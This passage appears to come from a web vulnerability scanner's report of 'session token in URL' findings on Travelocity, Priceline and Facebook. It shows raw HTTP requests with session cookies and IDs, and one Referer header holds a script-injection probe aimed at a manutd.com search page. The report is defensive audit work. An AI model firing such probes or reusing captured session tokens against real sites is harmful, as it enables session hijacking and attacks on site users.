Set-Cookie: JSID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ex.lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://travel.travelocity.com/hotel/HotelAvailability.do?.stc=50C7F54C8E08272A256D4F9FCD45DA82.p0611&dateFormat=mm/dd/yyyy&Service=TRAVELOCITY&cityCountryCode=US&city=bos&returningDate=mm/dd/yyyy&leavingDate=mm/dd/yyyy&searchMode=city&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


10.18. http://travel.travelocity.com/hotel/HotelDetail.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...

10.19. http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:59 GMT
Server: Apache
ETag: W/"359346-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 359346

<html><head><script>var $gwt_version = "2.0.0";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '3EF72E9199C4983B05BF027C4F5C4217';var $stats = $wnd.__gwtStats
...[SNIP]...

10.20. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/NoCacheAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pub/gwt/hotel/esf/NoCacheAction.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&service=TRAVELOCITY HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSID=4624190710EDB02407F82A5D5E671CC4.p0739; Domain=.travelocity.com; Path=/
ETag: W/"4888-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 4888

function esf(){var M='',nb='" for "gwt:onLoadErrorFn"',lb='" for "gwt:onPropertyErrorFn"',Y='"><\/script>',$='#',Lb='.cache.html?jsessionid='+jsessionid,ab='/',Fb='226C4CC2E5A5A4FBE9703DC949A8A7C5',Gb
...[SNIP]...

10.21. http://travel.travelocity.com/pub/gwt/hotel/esf/hotelresultlist.gwt-rpc

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/hotelresultlist.gwt-rpc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /pub/gwt/hotel/esf/hotelresultlist.gwt-rpc;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 205
Origin: http://travel.travelocity.com
X-GWT-Module-Base: http://travel.travelocity.com/pub/gwt/hotel/esf/
X-GWT-Permutation: 3EF72E9199C4983B05BF027C4F5C4217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/x-gwt-rpc; charset=UTF-8
Accept: */*
Referer: http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

5|0|6|http://travel.travelocity.com/pub/gwt/hotel/esf/|20BCC8EF5EB9AF0ECBD2A50D0ED60D3D|com.travelocity.ui.gwt.hotel.common.HotelResultListService|retrieve|Z|java.lang.Integer/3438268394|1|2|3|4|2|5|6
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:00 GMT
Server: Apache
Content-Disposition: attachment
Content-Length: 140
Connection: close
Content-Type: application/json;charset=utf-8

//EX[2,1,["com.travelocity.ui.gwt.hotel.common.exception.SessionExpiredException/1224607496","HotelResultListDTO not found in Session"],0,5]

10.22. http://travela.priceline.com/hotel/leaveBehindPop.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/leaveBehindPop.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/leaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=1&country=US&static=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600744165:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.2.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:26 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a2011100300322608e011577265; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=93E8720C5EB8B62C63F1FFE2A3CCE4FE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 959
Content-Type: text/html;charset=ISO-8859-1

<html>
<head>

<script language="Javascript">
function checkDom() {
   var sTest = "";
   var newURL;
   var thisURL = window.location.href;
   var bSecSwap = true;
   try{
       sTest = window.opener.doc
...[SNIP]...

10.23. http://travela.priceline.com/hotel/newHotelSearch.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/register.do?jsk=4663010a5564010a20111003003755e18011569968&INIT_SESSION=false">register</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=4663010a5564010a20111003003755e18011569968&dact=getPersonalInfo.do&INIT_SESSION=false">update profile</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=4663010a5564010a20111003003755e18011569968&dact=getDealPrefs.do&INIT_SESSION=false">deal preferences</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=4663010a5564010a20111003003755e18011569968&dact=getRewardsInfo.do&INIT_SESSION=false">my rewards</a>
...[SNIP]...

10.24. http://travela.priceline.com/hotel/searchHotels.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...

10.25. http://travela.priceline.com/hotel/searchResults.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/register.do?jsk=5463010a5064010a2011100300091519d011589950&INIT_SESSION=false">register</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=5463010a5064010a2011100300091519d011589950&dact=getPersonalInfo.do&INIT_SESSION=false">update profile</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=5463010a5064010a2011100300091519d011589950&dact=getDealPrefs.do&INIT_SESSION=false">deal preferences</a>
...[SNIP]...
<li><a rel="nofollow" href="https://travela.priceline.com/myprofile/setupSignIn.do?jsk=5463010a5064010a2011100300091519d011589950&dact=getRewardsInfo.do&INIT_SESSION=false">my rewards</a>
...[SNIP]...

10.26. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travelocity.tt.omtrdc.net
Path:   /m2/travelocity/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/travelocity/mbox/standard?mboxHost=www.travelocity.com&mboxSession=1317600481056-80236&mboxPage=1317600481056-80236&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxCount=1&ServiceTag=TRAVELOCITY&mbox=HMP&mboxId=0&mboxTime=1317582481071&mboxURL=http%3A%2F%2Fwww.travelocity.com%2F&mboxReferrer=http%3A%2F%2Fwww.travelocity.com%2Fresolve%2Fdefault&mboxVersion=39 HTTP/1.1
Host: travelocity.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 2713
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('HMP',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-HMP-0">');mb
...[SNIP]...

10.27. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=120836677942069&app_id=120836677942069&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c169940c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df4f4b2a24%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df64f7cd6%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13ca67784%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18123d9d%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df89532eac&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.136.46
X-Cnection: close
Date: Mon, 03 Oct 2011 00:02:48 GMT
Content-Length: 234

<script type="text/javascript">
parent.postMessage("cb=f13ca67784&origin=http\u00253A\u00252F\u00252Fwww.nike.com\u00252Ff20d909cc&relation=parent&transport=postmessage&frame=f89532eac", "http:\/\/www
...[SNIP]...

